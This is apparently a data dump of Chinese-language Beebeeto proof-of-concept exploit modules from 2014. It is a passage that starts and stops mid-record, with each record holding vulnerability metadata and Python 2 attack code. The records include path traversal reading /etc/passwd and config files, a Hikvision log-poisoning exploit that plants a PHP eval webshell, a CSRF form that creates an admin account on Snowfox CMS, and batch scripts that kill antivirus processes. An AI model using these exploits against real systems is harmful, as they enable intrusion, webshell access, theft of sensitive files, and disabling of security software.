\u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', 'html5-mp3-player-with-playlist\u6f0f\u6d1e', 'php'],\r\n            'desc': 'DORK: inurl:html5plus/html5full.php',\r\n            'references': ['http://www.exploit-db.com/exploits/35388/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_path = '/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php'\r\n        verify_url = args['options']['target'] + file_path\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<b>Fatal error</b>:' in content and '</b> on line <b>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "DORK: inurl:html5plus/html5full.php", "app_name": "WordPress", "id": "poc-2014-0166", "layer4_protocol": null}
+{"create_date": "2014-11-26 15:34:02", "name": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "jwong", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "U-Mail\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/api/api.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0165',\r\n            'name': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC',\r\n            'author': 'jwong',\r\n            'create_date': '2014-11-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'U-Mail',\r\n            'vul_version': ['20141124'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['U-Mail\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/api/api.php', 'php'],\r\n            'desc': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-070206',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/webmail/api/api.php?do=system'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'Warning' in content and 'system()' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002", "app_name": "U-Mail", "id": "poc-2014-0165", "layer4_protocol": null}
+{"create_date": "2014-11-25 10:32:53", "name": "\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,bnuoa/info/infoShowAction.do,Linux\u7248\u672c", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0163',\r\n            'name': '\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n            'author': '\u96f7\u950b',\r\n            'create_date': '2014-11-23',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'OA',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'bnuoa/info/infoShowAction.do', 'Linux\u7248\u672c'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-058386',\r\n            ]\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        verify_url = args['options']['target'] + ('/bnuoa/info/infoShowAction.do?accessory=1&id='\r\n                                                  '../../../../../../../../../../etc/passwd%00.jpg&method=getAccessory')\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"root:\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0163", "layer4_protocol": null}
+{"create_date": "2014-11-25 10:20:09", "name": "phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "jwong", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "phpstat\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d,/download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0162',\r\n            'name': 'phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC',\r\n            'author': 'jwong',\r\n            'create_date': '2014-11-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpstat',\r\n            'vul_version': ['1.0'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['phpstat\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d', '/download.php', 'php'],\r\n            'desc': 'phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002',\r\n            'references': ['http://0day5.com/archives/2372',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/download.php?fname=1.txt&fpath=./include.inc/config.inc.php'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'root' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002", "app_name": "phpstat", "id": "poc-2014-0162", "layer4_protocol": null}
+{"create_date": "2014-11-21 21:09:53", "name": "eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5927\u7070\u72fc", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou!\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,/sysinfo.html,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0157',\r\n            'name': 'eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': '\u5927\u5927\u7070\u72fc',\r\n            'create_date': '2014-11-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'eYou',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['eYou!\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '/sysinfo.html', 'php'],\r\n            'desc': 'eYou sysinfo Information Disclosure',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-061538',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        attack_url = args['options']['target'] + '/sysinfo.html'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + attack_url\r\n        request = urllib2.Request(attack_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        if 'Hostname:' in content and 'eyou' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['verify_url'] = attack_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "eYou sysinfo Information Disclosure", "app_name": "eYou", "id": "poc-2014-0157", "layer4_protocol": null}
+{"create_date": "2014-11-21 17:00:06", "name": "Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e,\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0156',\r\n            'name': 'Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Hikvision',\r\n            'vul_version': ['iVMS-4200'],\r\n            'type': 'Local File Inclusion',\r\n            'tag': ['\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e', '\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n            'desc': '\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2010-072453',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/<?echo(md5(bb2))?>'\r\n        test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            urllib2.urlopen(verify_url)\r\n        except urllib2.HTTPError, e:\r\n            if e.code == 500:\r\n                content = urllib2.urlopen(test_url).read()\r\n                if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['vul_url_1'] = verify_url\r\n                    args['poc_ret']['vul_url_2'] = test_url\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        verify_url = args['options']['target'] + '/<?echo(md5(bb2));eval($_POST[bb2])?>'\r\n        test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            urllib2.urlopen(verify_url)\r\n        except urllib2.HTTPError, e:\r\n            if e.code == 500:\r\n                content = urllib2.urlopen(test_url).read()\r\n                if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['webshell'] = test_url\r\n                    args['poc_ret']['password'] = 'bb2'\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002", "app_name": "\u6d77\u5eb7\u5a01\u89c6", "id": "poc-2014-0156", "layer4_protocol": null}
+{"create_date": "2014-11-20 23:48:10", "name": "Snowfox CMS 1.0 CSRF Add Admin Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "tmp", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Snowfox CMS\u6f0f\u6d1e,CSRF\u6dfb\u52a0\u7ba1\u7406\u5458,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0154',\r\n            'name': 'Snowfox CMS 1.0 CSRF Add Admin Exploit',\r\n            'author': 'tmp',\r\n            'create_date': '2014-11-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Snowfox',\r\n            'vul_version': ['1.0'],\r\n            'type': 'Cross Site Request Forgery',\r\n            'tag': ['Snowfox CMS\u6f0f\u6d1e', 'CSRF\u6dfb\u52a0\u7ba1\u7406\u5458', 'php'],\r\n            'desc': '''\r\n                    Snowfox CMS suffers from a cross-site request forgery vulnerabilities.\r\n                    The application allows users to perform certain actions via HTTP requests\r\n                    without performing any validity checks to verify the requests.\r\n                    This can be exploited to perform certain actions with administrative privileges\r\n                    if a logged-in user visits a malicious web site.\r\n                    Tested on: Apache/2.4.7 (Win32)\r\n                               PHP/5.5.6\r\n                               MySQL 5.6.14\r\n                    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n                    @zeroscience\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/35301/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        verify_url = args['options']['target']\r\n        if args['options']['verbose']:\r\n            print '[*] Generation: ' + verify_url\r\n        temp = '''\r\n        <div style=\"display: none;\">\r\n        <form action=\"%s/?uri=admin/accounts/create\" method=\"POST\" name=\"ff0000team\">\r\n          <input type=\"hidden\" name=\"emailAddress\" value=\"lab@zeroscience.mk\" />\r\n          <input type=\"hidden\" name=\"verifiedEmail\" value=\"verified\" />\r\n          <input type=\"hidden\" name=\"username\" value=\"USERNAME\" />\r\n          <input type=\"hidden\" name=\"newPassword\" value=\"PASSWORD\" />\r\n          <input type=\"hidden\" name=\"confirmPassword\" value=\"PASSWORD\" />\r\n          <input type=\"hidden\" name=\"userGroups[]\" value=\"34\" />\r\n          <input type=\"hidden\" name=\"userGroups[]\" value=\"33\" />\r\n          <input type=\"hidden\" name=\"memo\" value=\"CSRFmemo\" />\r\n          <input type=\"hidden\" name=\"status\" value=\"1\" />\r\n          <input type=\"hidden\" name=\"formAction\" value=\"submit\" />\r\n          <input type=\"submit\" value=\"Submit form\" />\r\n        </form>\r\n        </div>\r\n        <script>\r\n        setTimeout(\"document.ff0000team.submit()\", 2000);\r\n        </script>\r\n        ''' % verify_url\r\n        print '[*] Copy code: ' + temp\r\n        print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = 'Generation ok'\r\n        return args\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Snowfox CMS suffers from a cross-site request forgery vulnerabilities. \r\nThe application allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests.\r\nThis can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.\r\n \r\nTested on: \r\n    Apache/2.4.7 (Win32)\r\n    PHP/5.5.6\r\n    MySQL 5.6.14", "app_name": "Snowfox CMS", "id": "poc-2014-0154", "layer4_protocol": null}
+{"create_date": "2014-11-20 00:15:06", "name": "\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b,chkdsk taskkill,\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0153',\r\n            'name': '\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n            'author': '\u96f7\u8702',\r\n            'create_date': '2014-11-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'local',\r\n            'port': [0],\r\n            'layer4_protocol': [],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u767e\u5ea6',\r\n            'vul_version': ['20141010'],\r\n            'type': 'Other',\r\n            'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e'],\r\n            'desc': 'Wooyun Author zhuixing',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-078656',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        payload = '''\r\n@echo off\r\nmode con cols=20 lines=1\r\nchkdsk /x d:\r\ntaskkill /F /IM baidusdsvc.exe /T\r\ntaskkill /F /IM baidusdtray.exe /T\r\n'''\r\n        # write\r\n        test_bat = open('./baidu-anti-virus-taskkill.bat', 'w')\r\n        test_bat.write(payload)\r\n        test_bat.close()\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = 'Generation ok, file: ./baidu-anti-virus-taskkill.bat'\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u767e\u5ea6", "id": "poc-2014-0153", "layer4_protocol": null}
+{"create_date": "2014-11-20 00:05:56", "name": "360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389360\u4e3b\u8fdb\u7a0b,chkdsk taskkill,360\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0152',\r\n            'name': '360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n            'author': '\u96f7\u8702',\r\n            'create_date': '2014-11-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'local',\r\n            'port': [0],\r\n            'layer4_protocol': [],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '360',\r\n            'vul_version': ['*'],\r\n            'type': 'Other',\r\n            'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389360\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '360\u6f0f\u6d1e'],\r\n            'desc': '''\r\n                    Wooyun Author zhuixing:\r\n                    \u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n                    \u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n                    \u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002\r\n\r\n                    ''',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-078641',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        payload = '''\r\n@echo off\r\n\r\nchkdsk /x e:\r\n\r\ntaskkill /F /IM 360tray.exe /T\r\n'''\r\n        # write\r\n        test_bat = open('./360-taskkill.bat', 'w')\r\n        test_bat.write(payload)\r\n        test_bat.close()\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat'\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Wooyun Author zhuixing:\r\n\u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n\u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n\u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002", "app_name": "360", "id": "poc-2014-0152", "layer4_protocol": null}
+{"create_date": "2014-11-19 11:14:22", "name": "D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "D-Link\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/cgi-bin/sddownload.cgi,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0149',\r\n            'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'D-Link',\r\n            'vul_version': 'DCS-2103',\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['D-Link\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/cgi-bin/sddownload.cgi', 'cgi'],\r\n            'desc': '''\r\n                    